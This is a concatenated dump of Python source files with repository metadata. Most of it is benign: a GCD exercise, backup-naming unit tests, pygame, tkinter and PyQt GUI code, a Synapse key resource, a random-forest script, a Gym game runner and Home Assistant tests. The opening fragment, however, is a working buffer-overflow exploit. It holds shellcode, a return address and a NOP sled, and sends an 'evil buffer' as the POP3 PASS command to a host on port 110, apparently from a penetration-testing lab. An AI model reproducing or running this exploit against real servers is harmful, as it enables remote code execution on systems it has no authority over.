"\x3a\x8f\x4f\x3d\x55\x98\x3c\x0f\xfa\x32\xaa\x23\x73\x9d\x2d"
"\x43\xae\x59\xa1\xba\x51\x9a\xe8\x78\x05\xca\x82\xa9\x26\x81"
"\x52\x55\xf3\x06\x02\xf9\xac\xe6\xf2\xb9\x1c\x8f\x18\x36\x42"
"\xaf\x23\x9c\xeb\x5a\xde\x77\x1e\x90\xe0\xd7\x76\xa4\xe0\xd6"
"\x3d\x21\x06\xb2\x51\x64\x91\x2b\xcb\x2d\x69\xcd\x14\xf8\x14"
"\xcd\x9f\x0f\xe9\x80\x57\x65\xf9\x75\x98\x30\xa3\xd0\xa7\xee"
"\xcb\xbf\x3a\x75\x0b\xc9\x26\x22\x5c\x9e\x99\x3b\x08\x32\x83"
"\x95\x2e\xcf\x55\xdd\xea\x14\xa6\xe0\xf3\xd9\x92\xc6\xe3\x27"
"\x1a\x43\x57\xf8\x4d\x1d\x01\xbe\x27\xef\xfb\x68\x9b\xb9\x6b"
"\xec\xd7\x79\xed\xf1\x3d\x0c\x11\x43\xe8\x49\x2e\x6c\x7c\x5e"
"\x57\x90\x1c\xa1\x82\x10\x3c\x40\x06\x6d\xd5\xdd\xc3\xcc\xb8"
"\xdd\x3e\x12\xc5\x5d\xca\xeb\x32\x7d\xbf\xee\x7f\x39\x2c\x83"
"\x10\xac\x52\x30\x10\xe5")
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C"*(3500-2606-4-351-16)
try:
print "\nSending evil buffer..."
s.connect(('10.11.25.84', 110))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to POP3!"
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
cb8e8814cc62f4c8391fcb723e8027d1860d330b
|
e8c16328e22b8ccda2e3d2998d2ec1689d79914b
|
/exercise_2017/5th_week/test_1.py
|
0ea44957c76a9923802c513c58e5213bc91b5f64
|
[
"MIT"
] |
permissive
|
Taewan-P/python_study
|
e2e68cc0f1467832dace22e27cc70d217560cf2c
|
f347e370aaa33aba5ab233252bcd759b94615348
|
refs/heads/master
| 2021-05-11T03:44:04.495186
| 2018-01-18T03:02:31
| 2018-01-18T03:02:31
| 117,923,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 548
|
py
|
def gcd1_2(m,n):
print("gcd1_2")
def loop(m, n, k):
print("gcd1_2, loop",m,n,k)
if not(m==0 or n==0):
if m%2==0 and n%2==0:
return loop(m//2,n//2,k*2) #오류 발생시 여기 확인!!(빈칸 있는 부분 k)
elif m%2==0 and n%2==1:
return loop(m//2,n,k)
elif m%2==1 and n%2==0:
return loop(m,n//2,k)
elif m<=n:
return loop(m,(n-m)//2,k)
else:
return loop(n,(m-n)//2,k)
else:
if m==0:
return abs(n*k)
else: #n==0
return abs(m*k)
return loop(m,n,1)
print(gcd1_2(18,48))
|
[
"swimtw@naver.com"
] |
swimtw@naver.com
|
9e1bdaa9a0888f3ccb9eba4f462b36b5688e2936
|
2bf1ffde9ed692e27c34d23b67babd95f8f5644d
|
/tests/test_naming.py
|
6fa54b180e6d20e00b54c2fda549cc654ac5e57b
|
[
"MIT"
] |
permissive
|
pvrk/python_backup
|
9dea3d657e619902aebbdcfc236b4eac9c302609
|
d61af53490c791bac1226062af7744a69b335ce9
|
refs/heads/master
| 2022-03-21T06:25:11.638414
| 2019-12-17T17:50:25
| 2019-12-17T17:50:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,233
|
py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------
"""Unit tests for Naming."""
import unittest
from asebackupcli.naming import Naming
class TestNaming(unittest.TestCase):
"""Unit tests for class Naming."""
def test_backup_type_str(self):
"""Test Naming.backup_type_str"""
self.assertEqual(
Naming.backup_type_str(is_full=True),
'full')
self.assertEqual(
Naming.backup_type_str(is_full=False),
'tran')
def test_type_str_is_full(self):
"""Test Naming.type_str_is_full"""
self.assertEqual(
Naming.type_str_is_full('full'),
True)
self.assertEqual(
Naming.type_str_is_full('tran'),
False)
def test_construct_filename(self):
"""Test Naming.construct_filename"""
self.assertEqual(
Naming.construct_filename(dbname="test1db", is_full=True,
start_timestamp="20180601_112429",
stripe_index=2, stripe_count=101),
'test1db_full_20180601_112429_S002-101.cdmp')
self.assertEqual(
Naming.construct_filename(dbname="test1db", is_full=False,
start_timestamp="20180601_112429",
stripe_index=2, stripe_count=101),
'test1db_tran_20180601_112429_S002-101.cdmp')
def test_construct_blobname_prefix(self):
"""Test Naming.construct_blobname_prefix"""
self.assertEqual(
Naming.construct_blobname_prefix(dbname="test1db", is_full=True),
'test1db_full_')
def test_construct_blobname(self):
"""Test Naming.construct_blobname"""
self.assertEqual(
Naming.construct_blobname(
dbname="test1db",
is_full=True,
start_timestamp="20180601_112429",
end_timestamp="20180601_131234",
stripe_index=2,
stripe_count=101),
'test1db_full_20180601_112429--20180601_131234_S002-101.cdmp')
def test_parse_ase_generated_filename(self):
"""Test Naming.parse_ase_generated_filename"""
self.assertEqual(
Naming.parse_ase_generated_filename('AZU_trans_20181205_091930_S01-11.cdmp'),
('AZU', '20181205_091930', 1, 11)
)
self.assertEqual(
Naming.parse_ase_generated_filename('AZU_tran_20181205_091930_S01-11.cdmp'),
None
)
def test_parse_filename(self):
"""Test Naming.parse_filename"""
self.assertEqual(
Naming.parse_filename('test1db_full_20180601_112429_S002-101.cdmp'),
('test1db', True, '20180601_112429', 2, 101))
self.assertEqual(
Naming.parse_filename('test1db_tran_20180601_112429_S02-08.cdmp'),
('test1db', False, '20180601_112429', 2, 8))
self.assertEqual(
Naming.parse_filename('bad_input') is None,
True)
def test_parse_blobname(self):
"""Test Naming.parse_blobname"""
self.assertEqual(
Naming.parse_blobname('test1db_full_20180601_112429--20180601_131234_S002-101.cdmp'),
('test1db', True, '20180601_112429', '20180601_131234', 2, 101)
)
self.assertEqual(
Naming.parse_blobname('test1db_tran_20180601_112429--20180601_131234_S2-008.cdmp'),
('test1db', False, '20180601_112429', '20180601_131234', 2, 8)
)
self.assertEqual(
Naming.parse_filename('bad_input'),
None
)
def test_pipe_names(self):
"""Test Naming.pipe_names"""
self.assertEqual(
Naming.pipe_names(dbname='AZU', is_full=True, stripe_count=3, output_dir='/tmp'),
[
'/tmp/backup_AZU_full_001_003.cdmp_pipe',
'/tmp/backup_AZU_full_002_003.cdmp_pipe',
'/tmp/backup_AZU_full_003_003.cdmp_pipe'
]
)
|
[
"chgeuer@microsoft.com"
] |
chgeuer@microsoft.com
|
523d338761f9c0eeceeea3dc1511eeec56a1d292
|
2cef2c608bde91a8e2deb4f88d62e164fce9a0e3
|
/4 - sprites and animations/Codebeispiele/first_sprite.py
|
493830ae10edf48a32b7a4e9df3906a845dee76f
|
[] |
no_license
|
mimuc/mmp-ss21
|
3be6c67e1951f673e5a28d1c1fd44fe2dfe4cb47
|
e20c5363b0ddf1866b7b7c044da7bb9a8330af20
|
refs/heads/master
| 2023-05-31T07:43:44.275815
| 2021-06-21T11:58:13
| 2021-06-21T11:58:13
| 355,538,628
| 5
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
import pygame
from pygame.locals import *
class Box(pygame.sprite.Sprite):
def __init__(self, color, initial_position):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface((20,20))
self.image.fill(color)
self.rect = self.image.get_rect()
self.rect.topleft = initial_position
def update(self):
pass
pygame.init()
screen = pygame.display.set_mode((640, 480), 0, 32)
box = Box((255,0,0),(0,0))
while True:
for event in pygame.event.get():
if event.type == QUIT:
exit()
screen.fill((0, 0, 0))
screen.blit(box.image,box.rect)
pygame.display.update()
|
[
"florian.bemmann@ifi.lmu.de"
] |
florian.bemmann@ifi.lmu.de
|
eab2e26261a3cbc0a255243129e8e1698d3489e8
|
7f6e573bfe32c1085311a13c79f7c1e2d7a83f79
|
/00977 - Squares of a Sorted Array/solutions.py
|
dcc18552d2afcdc3ec33bd0f108a38b8b4318d50
|
[] |
no_license
|
ngoyal16/LeetCode
|
0b7366c566996422ca7b89c3b0540e494aab4e9f
|
747b902224bd3ded576a67c926cc1fbb458a97d3
|
refs/heads/master
| 2022-12-10T08:34:19.590452
| 2022-12-07T08:28:05
| 2022-12-07T08:28:05
| 175,677,750
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
class Solution(object):
def sortedSquares(self, A):
"""
:type A: List[int]
:rtype: List[int]
"""
return map(lambda x: x * x, sorted(A, key=abs))
|
[
"noreply@github.com"
] |
ngoyal16.noreply@github.com
|
ff4ba646859730beeecd4cb569fbc5a89f48be03
|
ce7bb5ba72569d1503a54551ce99bb45addd9d15
|
/components/main window (1).py
|
c3e235727794891b14f8b40a59c1877b74f24f77
|
[] |
no_license
|
vic025/todo
|
4fe620ace4704cacfba270494782a166bfd2aa5a
|
56872e1de1ae12fd2c8c10ac3055737372ae3445
|
refs/heads/master
| 2023-07-01T17:58:23.010349
| 2021-08-06T23:06:37
| 2021-08-06T23:06:37
| 363,345,349
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,021
|
py
|
# GUI of main window without functionality
import tkinter as tk
from tkinter.font import Font
from tkinter import *
from tkmacosx import Button, CircleButton
from PIL import Image, ImageTk
root = tk.Tk()
root.title('To-do List')
root.geometry('370x500+600+75')
root.resizable(False, False)
# Title (1)
# Font size and weight for the title
title_label_font = Font(
family="SF Pro Rounded",
size=20,
weight="bold"
)
# Title name
title_label = tk.Label(root, text="To-do List",
font=title_label_font)
title_label.place(x=30, y=25)
# Inputs (1)
# Task name entry
new_task_entry = Entry(root, width=11)
new_task_entry.place(x=35, y=75)
# Time entry
new_task_entry_1 = Entry(root, width=5)
new_task_entry_1.place(x=156, y=75)
# Date entry
new_task_entry_2 = Entry(root, width=7)
new_task_entry_2.place(x=223, y=75)
# List (1)
list_tasks = tk.Listbox(width=29, height=16)
list_tasks.place(x=35, y=125)
# Buttons (1)
# Add task button
add_image = ImageTk.PhotoImage(
Image.open("/Users/vic/PycharmProjects/todo/images/add.png"))
add_task_button = CircleButton(root, image=add_image, bg='#ffffff',
fg='#000000', borderless=1, width=35)
add_task_button.place(x=308, y=71)
# Delete selected task button
delete_selected = Button(root, text="Delete", bg='#ffffff',
fg='#000000', borderless=1,
activebackground=('#C96666', '#C96666'))
delete_selected.place(x=35, y=423)
# Delete all tasks
delete_all = Button(root, text="Delete all", bg='#ffffff',
fg='#000000', borderless=1,
activebackground=('#C96666', '#C96666'))
delete_all.place(x=134, y=423)
# Settings button
settings_image = ImageTk.PhotoImage(
Image.open("/Users/vic/PycharmProjects/todo/images/settings.png"))
settings_button = CircleButton(root, image=settings_image, bg='#ffffff',
fg='#000000', borderless=1, width=35)
settings_button.place(x=308, y=418)
root.mainloop()
|
[
"v1q025@gmail.com"
] |
v1q025@gmail.com
|
bff704cfdcc8f2836f96e353d4860b781fb0d8a3
|
3793afb30d9e4ec39a75b2e5618cd6a2eaed0737
|
/portal system/synapse/synapse/rest/key/v1/server_key_resource.py
|
6df46969c4548ae5037bf6630d13f802cdf3c600
|
[
"Apache-2.0"
] |
permissive
|
rubyspiderman/chatsystem_reactjs
|
16a49a2026b70d0556105b02248362bbbfbfc1f9
|
a20edf38b83fe8c2ee36c2a7f3e1f7263dd134e1
|
refs/heads/master
| 2021-01-01T05:18:08.870728
| 2016-05-13T08:33:59
| 2016-05-13T08:33:59
| 58,717,217
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,996
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2014, 2015 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.web.resource import Resource
from synapse.http.server import respond_with_json_bytes
from signedjson.sign import sign_json
from unpaddedbase64 import encode_base64
from canonicaljson import encode_canonical_json
from OpenSSL import crypto
import logging
logger = logging.getLogger(__name__)
class LocalKey(Resource):
"""HTTP resource containing encoding the TLS X.509 certificate and NACL
signature verification keys for this server::
GET /key HTTP/1.1
HTTP/1.1 200 OK
Content-Type: application/json
{
"server_name": "this.server.example.com"
"verify_keys": {
"algorithm:version": # base64 encoded NACL verification key.
},
"tls_certificate": # base64 ASN.1 DER encoded X.509 tls cert.
"signatures": {
"this.server.example.com": {
"algorithm:version": # NACL signature for this server.
}
}
}
"""
def __init__(self, hs):
self.hs = hs
self.version_string = hs.version_string
self.response_body = encode_canonical_json(
self.response_json_object(hs.config)
)
Resource.__init__(self)
@staticmethod
def response_json_object(server_config):
verify_keys = {}
for key in server_config.signing_key:
verify_key_bytes = key.verify_key.encode()
key_id = "%s:%s" % (key.alg, key.version)
verify_keys[key_id] = encode_base64(verify_key_bytes)
x509_certificate_bytes = crypto.dump_certificate(
crypto.FILETYPE_ASN1,
server_config.tls_certificate
)
json_object = {
u"server_name": server_config.server_name,
u"verify_keys": verify_keys,
u"tls_certificate": encode_base64(x509_certificate_bytes)
}
for key in server_config.signing_key:
json_object = sign_json(
json_object,
server_config.server_name,
key,
)
return json_object
def render_GET(self, request):
return respond_with_json_bytes(
request, 200, self.response_body,
version_string=self.version_string
)
def getChild(self, name, request):
if name == '':
return self
|
[
"rubyspiderman@hotmail.com"
] |
rubyspiderman@hotmail.com
|
0fdfd0a2fe0d2384fb8bf820f0da8991e1d1fce7
|
0a6f6cf66643975895b099004d45aeef6c454c0f
|
/sshc/modelPredict.py
|
8a20d7116d5d2059355091de88d95c096d89c681
|
[] |
no_license
|
hpqcp/Dryer-Project1
|
1f2a1d8bb22f1ab2af00087e9130a691e6cb052f
|
a0fbad8a45d6d03919cdc9f32d53da9879a7c36b
|
refs/heads/master
| 2020-04-29T02:17:06.052118
| 2020-02-25T06:42:27
| 2020-02-25T06:42:27
| 175,760,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,810
|
py
|
#
#
#
import pandas as pd
#
#
#return: 训练后模型 , 标准化对象X , 标准化对象y
def randomForest_model(_xTrain: object, _yTrain: object) -> object:
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
# 训练数据和测试数据进行标准化处理
ss_x = StandardScaler()
x_train = ss_x.fit_transform(_xTrain)
# x_test = ss_x.transform(_xTest)
ss_y = StandardScaler()
y_train = ss_y.fit_transform(_yTrain.reshape(-1, 1))
# y_test = ss_y.transform(_yTest.reshape(-1, 1))
#生成模型
rf_model = RandomForestRegressor(n_jobs=-1)
rf_model.fit(x_train, y_train)
return rf_model,ss_x,ss_y
#
#
#
def randomForest_predict_score(_model: object, _ssx: object, _ssy: object, _xTest: object, _yTest: object, _isPlot: object = False) -> object:
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error
import chart.plot as plt
# rfr,ss_x,ss_y = randomForest_model(_xTrain,_yTrain)
xTest1 = _ssx.transform(_xTest)
y_predict = _model.predict(xTest1)
df_p = pd.DataFrame(_ssy.inverse_transform(y_predict)) # 将标准化后的数据转换为原始数据。
# df_t = pd.DataFrame(_ssy.inverse_transform(_yTest)) # 将标准化后的数据转换为原始数据。
df_t = pd.DataFrame(_yTest)
df = pd.concat([df_t, df_p], axis=1,ignore_index=True)
if _isPlot:
plt.pairPlot(df)
r2 = r2_score(df.values[:, 0], df.values[:, 1])
mse = mean_squared_error(df.values[:, 0], df.values[:, 1])
mae = mean_absolute_error(df.values[:, 0], df.values[:, 1])
return {'R2':r2,'MSE':mse,'MAE':mae},df
#
def model_load(_path=None):
from sklearn.externals import joblib
if _path == None :
raise Exception('模型加载路径为空!')
try:
model = joblib.load(_path)
except:
raise Exception('模型加载错误!')
else:
return model
#
#
def model_save(_model=None,_path=None):
from sklearn.externals import joblib
if _model==None or _path == None :
raise Exception('模型或保存路径为空!')
try:
joblib.dump(_model,_path)
except:
raise Exception('模型保存错误!')
else:
return
#parm : 1.
#return : 1.得分数组 2.评价得分
def cross_score(_x,_y,_n):
from sklearn import metrics
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
# 训练数据和测试数据进行标准化处理
ss_x = StandardScaler()
x1 = ss_x.fit_transform(_x)
ss_y = StandardScaler()
y1 = ss_y.fit_transform(_y.reshape(-1, 1))
randomForest_model = RandomForestRegressor()
kf = KFold(n_splits=_n, shuffle=True)
score_ndarray = cross_val_score(randomForest_model, x1, y1, cv=kf)
return score_ndarray,score_ndarray.mean()
#
#
#
def feature_selection_sshc(_x,_y):
from sklearn.ensemble import RandomForestRegressor
from sklearn.feature_selection import SelectFromModel
from sklearn.preprocessing import StandardScaler
#训练数据和测试数据进行标准化处理
ss_x = StandardScaler()
x1 = ss_x.fit_transform(_x)
ss_y = StandardScaler()
y1 = ss_y.fit_transform(_y.reshape(-1, 1))
clf = RandomForestRegressor()
clf = clf.fit(x1, y1)
return clf.feature_importances_ # 显示每一个特征的重要性指标,越大说明越重要,可以看出,第三第四两个特征比较重要
#
#
#
#
def searchCV(_x,_y,_testSize=0.25):
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import r2_score,mean_squared_error,mean_absolute_error
import chart.plot as plt
# 随机采样25%作为测试 75%作为训练
# x_train, x_test, y_train, y_test = train_test_split(df_x, df_y, test_size=_testSize, random_state=33)
# randomForest_predict(x_train,y_train,x_test,y_test)
#
#
#
if __name__ == "__main__":
__spec__ = None
import utils.excel2redis as rds
import sshc.timeAlignment as timeAlign
import numpy as np
df = rds.getBatchData('4000-2019-10-08*', 1)
df1 = pd.DataFrame(df.values[:, [3, 1, 6, 10, 11, 12, 13, 14, 17]])
df2 = pd.DataFrame(df1,dtype=np.float)
pointDiffList = [0,80,34,17,52,14,3,21,52]
df3=timeAlign.time_align_transform(df2,pointDiffList)
df_y = df3.values[:,0]
df_x = df3.values[:,1:]
#
# model , StandardScaler_x,StandardScaler_y = randomForest_model(df_x,df_y)
# model_save(model,'c://model1.m')
# model_save(StandardScaler_x, 'c://ssx1.m')
# model_save(StandardScaler_y, 'c://ssy1.m')
from sklearn.externals import joblib
model = joblib.load('c://model1.m')
ssx = joblib.load('c://ssx1.m')
ssy = joblib.load('c://ssy1.m')
scores = randomForest_predict_score(model,ssx,ssy, df_x, df_y, _isPlot=True)
# fi = model.feature_importances_
# feature_selection_sshc(df_x,df_y)
#scores,mean_score = cross_score(df_x,df_y,10)
#searchCV(df_x,df_y,_testSize=0.2)
# import chart.plot as plt
# plt.pairPlot(DataFrame(df_y))
# df_train_x = df3.values[200:1500,1:]
# df_train_y = df3.values[200:1500, 0]
# df_test_x = df3.values[200:399,1:]
# df_test_y = df3.values[200:399, 0]
# randomForest_predict(df_train_x,df_train_y,df_test_x,df_test_y)
# time_align_fit(df1,[0,10,20,30,40,50,60,70,80,90,100])
print
|
[
"14499382@qq.com"
] |
14499382@qq.com
|
45ee8e725516dbf7e4470dd77fffccc3827108a8
|
98897a706b48f40ac34cf6d1722e086bd87043ff
|
/analysis_everglades/game_logic/test_battle.py
|
fa4026e51646220353ca57eb39ad74a07ab9862b
|
[] |
no_license
|
shaunhyp57/everglades
|
dae28fb1695443fb6bb0a1e7c81d50b320dba400
|
e4aab93d7fe8147ed3917605b2755ed429884b84
|
refs/heads/master
| 2022-04-25T03:07:24.999084
| 2020-04-27T16:32:12
| 2020-04-27T16:32:12
| 238,527,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,750
|
py
|
## Static Imports
import os
import importlib
import gym
import gym_everglades
import pdb
import numpy as np
from everglades_server import server
## Input Variables
# Agent files must include a class of the same name with a 'get_action' function
# Do not include './' in file path
agent0_file = 'agents/base_rushV1.py'
#agent1_file = 'agents/same_commands.py'
agent1_file = 'agents/random_actions.py'
config_dir = 'config/'
map_file = config_dir + 'DemoMap.json'
setup_file = config_dir + 'GameSetup.json'
unit_file = config_dir + 'UnitDefinitions.json'
output_dir = 'game_telemetry/'
debug = 1
## Specific Imports
agent0_name, agent0_extension = os.path.splitext(agent0_file)
agent0_mod = importlib.import_module(agent0_name.replace('/','.'))
agent0_class = getattr(agent0_mod, os.path.basename(agent0_name))
agent1_name, agent1_extension = os.path.splitext(agent1_file)
agent1_mod = importlib.import_module(agent1_name.replace('/','.'))
agent1_class = getattr(agent1_mod, os.path.basename(agent1_name))
## Main Script
env = gym.make('everglades-v0')
players = {}
names = {}
players[0] = agent0_class(env.num_actions_per_turn, 0)
names[0] = agent0_class.__name__
players[1] = agent1_class(env.num_actions_per_turn, 1)
names[1] = agent1_class.__name__
observations = env.reset(
players=players,
config_dir = config_dir,
map_file = map_file,
unit_file = unit_file,
output_dir = output_dir,
pnames = names,
debug = debug
)
actions = {}
## Game Loop
done = 0
while not done:
if debug:
env.game.debug_state()
for pid in players:
actions[pid] = players[pid].get_action( observations[pid] )
observations, reward, done, info = env.step(actions)
print(reward)
|
[
"shaunhyp57@knights.ucf.edu"
] |
shaunhyp57@knights.ucf.edu
|
cc5c849e8b995ce39d61d9943324e59b7c3290cd
|
553cced42ec61dc58753a6cc3e108a7c0695962c
|
/04-QWidget-焦点控制.py
|
c17715f3bc0b0c6c447b62bc46d218cd2e8b0116
|
[] |
no_license
|
dongsen2019/pyqt5
|
4023bbff61310e6f2cf92cbdf5d4d960a7705f4c
|
a5c166d28718119bdd2d1c2a2860e3dfeb936414
|
refs/heads/master
| 2023-01-29T22:24:50.702505
| 2020-12-13T12:01:55
| 2020-12-13T12:01:55
| 300,865,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,265
|
py
|
# 0. 导入需要的包和模块
from PyQt5.Qt import *
import sys
class Window(QWidget):
def mousePressEvent(self, evt):
# print(self.focusWidget())
# self.focusNextChild()
# self.focusPreviousChild()
self.focusNextPrevChild(True)
"""
focusWidget() 获取当前窗口内部, 所有子控件当中获取焦点的那个控件
focusNextChild() 聚焦下一个子控件
focusPreviousChild() 聚焦上一个子控件
focusNextPrevChild(True) True: 下一个 False: 上一个
"""
# 1. 创建一个应用程序对象
app = QApplication(sys.argv)
# 2. 控件的操作
# 2.1 创建控件
window = Window()
# 2.2 设置控件
window.setWindowTitle("焦点控制")
window.resize(500, 500)
le1 = QLineEdit(window)
le1.move(50, 50)
le2 = QLineEdit(window)
le2.move(100, 100)
le3 = QLineEdit(window)
le3.move(150, 150)
"""
默认情况下,点击鼠标和按下键盘来获取或者切换焦点
"""
# 注意这是静态类方法
QWidget.setTabOrder(le1, le3)
QWidget.setTabOrder(le3, le2)
"""
设置子控件获取焦点的先后顺序
"""
# le2.setFocus() 设置le2为打开界面时默认获取的焦点
# le2.setFocusPolicy(Qt.TabFocus)
# le2.setFocusPolicy(Qt.ClickFocus)
# le2.setFocusPolicy(Qt.StrongFocus)
# le2.setFocusPolicy(Qt.NoFocus)
"""
设置焦点策略:
setFocusPolicy(Qt.TabFocus) 通过Tab键获得焦点
setFocusPolicy(Qt.ClickFocus) 通过被单击获得焦点
setFocusPolicy(Qt.StrongFocus) 可通过上面两种方式获得焦点
Qt.NoFocus 不能通过上两种方式获得焦点(打开界面后默认情况下),setFocus仍可使其获得焦点
"""
# le2.setFocus() 设置为焦点
# le2.clearFocus() 取消焦点
# 2.3 展示控件
window.show()
# print(le1)
# print(le2)
# print(le3)
# le2.setFocus()
# 获取当前窗口内部, 所有子控件当中获取焦点的那个控件
"""
文本框获取焦点的时间在下面的代码之后,因此打印位None
但如果展示窗口后设置了焦点,就能被打印出来
window.show()
# print(le1)
# print(le2)
# print(le3)
# le2.setFocus()
"""
# print(window.focusWidget())
# le1.clearFocus()
# 3. 应用程序的执行, 进入到消息循环
sys.exit(app.exec_())
|
[
"378250523@qq.com"
] |
378250523@qq.com
|
5311ad2fb6847110b4a1606ef629ada8e3ae8b27
|
688ae097a1f413f82c4a4f2840153e261a8504d4
|
/main.spec
|
c69f5a6d2fd675096c0caa96c2e7cf7cb3a26355
|
[
"MIT"
] |
permissive
|
Danverr/DeliveryCalc
|
f1225401db3e47733199044800f6752c06933550
|
c4384fc2a991817e09707288006937bd45183d71
|
refs/heads/master
| 2020-09-16T01:53:49.359474
| 2019-11-23T16:12:38
| 2019-11-23T16:12:38
| 223,615,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,240
|
spec
|
# -*- mode: python -*-
block_cipher = None
a = Analysis(['DeliveryCalc.py'],
pathex=['.'],
binaries=[],
hiddenimports=['Code/*.pyd'],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
Key = ['mkl','libopenblas']
def remove_from_list(input, keys):
outlist = []
for item in input:
name, _, _ = item
flag = 0
for key_word in keys:
if name.find(key_word) > -1:
flag = 1
if flag != 1:
outlist.append(item)
return outlist
a.binaries = remove_from_list(a.binaries, Key)
exe = EXE(pyz,
a.scripts,
exclude_binaries=True,
name='DeliveryCalc',
debug=False,
strip=False,
upx=True,
console=True )
coll = COLLECT(exe,
a.binaries,
a.zipfiles,
a.datas,
strip=False,
upx=True,
name='DeliveryCalc')
|
[
"noreply@github.com"
] |
Danverr.noreply@github.com
|
dcfd08920d5d8dc25f09f1674d7a69c10ecedbb1
|
1bed2f766620acf085ed2d7fd3e354a3482b8960
|
/tests/components/sensibo/test_entity.py
|
818d9ddb92499f60c743ebd9a3a8e50177e03817
|
[
"Apache-2.0"
] |
permissive
|
elupus/home-assistant
|
5cbb79a2f25a2938a69f3988534486c269b77643
|
564150169bfc69efdfeda25a99d803441f3a4b10
|
refs/heads/dev
| 2023-08-28T16:36:04.304864
| 2022-09-16T06:35:12
| 2022-09-16T06:35:12
| 114,460,522
| 2
| 2
|
Apache-2.0
| 2023-02-22T06:14:54
| 2017-12-16T12:50:55
|
Python
|
UTF-8
|
Python
| false
| false
| 2,826
|
py
|
"""The test for the sensibo entity."""
from __future__ import annotations
from unittest.mock import patch
from pysensibo.model import SensiboData
import pytest
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
)
from homeassistant.components.sensibo.const import SENSIBO_ERRORS
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import device_registry as dr, entity_registry as er
async def test_entity(
hass: HomeAssistant, load_int: ConfigEntry, get_data: SensiboData
) -> None:
"""Test the Sensibo climate."""
state1 = hass.states.get("climate.hallway")
assert state1
dr_reg = dr.async_get(hass)
dr_entries = dr.async_entries_for_config_entry(dr_reg, load_int.entry_id)
dr_entry: dr.DeviceEntry
for dr_entry in dr_entries:
if dr_entry.name == "Hallway":
assert dr_entry.identifiers == {("sensibo", "ABC999111")}
device_id = dr_entry.id
er_reg = er.async_get(hass)
er_entries = er.async_entries_for_device(
er_reg, device_id, include_disabled_entities=True
)
er_entry: er.RegistryEntry
for er_entry in er_entries:
if er_entry.name == "Hallway":
assert er_entry.unique_id == "Hallway"
@pytest.mark.parametrize("p_error", SENSIBO_ERRORS)
async def test_entity_failed_service_calls(
hass: HomeAssistant,
p_error: Exception,
load_int: ConfigEntry,
get_data: SensiboData,
) -> None:
"""Test the Sensibo send command with error."""
state = hass.states.get("climate.hallway")
assert state
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
side_effect=p_error,
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
|
[
"noreply@github.com"
] |
elupus.noreply@github.com
|
deb20b06a842a226505f4352f62729b0865cad89
|
f0463eba4010126fc0574945c2f9b2cd6eb40cff
|
/Component/Windows.py
|
f5c0b35c5e82f1d6668ba09e042bf92cf2805776
|
[] |
no_license
|
Choewonyeong/Standard_Project3
|
b572c3fbf2ac379980b95d7247c867f092b7a09d
|
155903d450c1da7355914c72aa07b8f23a03e336
|
refs/heads/master
| 2022-06-21T18:51:42.766380
| 2020-05-08T00:28:04
| 2020-05-08T00:28:04
| 262,183,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,657
|
py
|
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon, QPixmap
from PyQt5.QtWidgets import QWidget, QAction, QMenu, QMenuBar, QLineEdit
from PyQt5.QtWidgets import QDialog, QTableWidget, QTableWidgetItem, QLabel
